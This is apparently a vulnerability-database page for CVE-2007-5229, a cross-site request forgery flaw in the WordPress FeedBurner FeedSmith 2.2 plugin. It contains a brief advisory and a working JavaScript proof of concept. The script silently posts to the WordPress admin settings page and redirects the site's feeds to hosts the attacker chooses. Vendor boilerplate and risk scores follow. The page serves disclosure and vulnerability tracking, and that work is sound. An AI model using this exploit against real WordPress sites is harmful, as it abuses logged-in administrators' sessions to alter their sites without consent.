WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2007-5229 | 5 Oct 200723:00 | – | cve | |
| CVE-2007-5229 | 5 Oct 200723:00 | – | cvelist | |
| EUVD-2007-5209 | 7 Oct 202500:30 | – | euvd | |
| CVE-2007-5229 | 5 Oct 200723:17 | – | nvd | |
| WordPress FeedBurner Plugin <= 2.2 - CSRF | 5 Oct 200700:00 | – | patchstack | |
| Cross site request forgery (csrf) | 5 Oct 200723:17 | – | prion |
source: https://www.securityfocus.com/bid/25921/info
FeedBurner FeedSmith is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to use a victim's currently active session to perform actions with the application.
This issue affects FeedBurner FeedSmith 2.2; other versions may also be affected.
// Simple Proof of Concept Exploit for FeedSmith Feedburner CSRF Hijacking
// Tested on version 2.2.
t='http://www.example.com/wordpress/wp-admin/options-general.php?
page=FeedBurner_FeedSmith_Plugin.php';
p='redirect=true&feedburner_url=http://www.example2.com/with/new/feed&
feedburner_comments_url=http://www.example3.com/with/new/feed';
feedburner_csrf = function(t, p) {
req = new XMLHttpRequest();
var url = t;
var params = p;
req.open("POST", url);
req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
req.setRequestHeader("Content-length", params.length);
req.setRequestHeader("Connection", "close");
req.send(params);
};
feedburner_csrf(t,p);Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.4
EPSS0.04898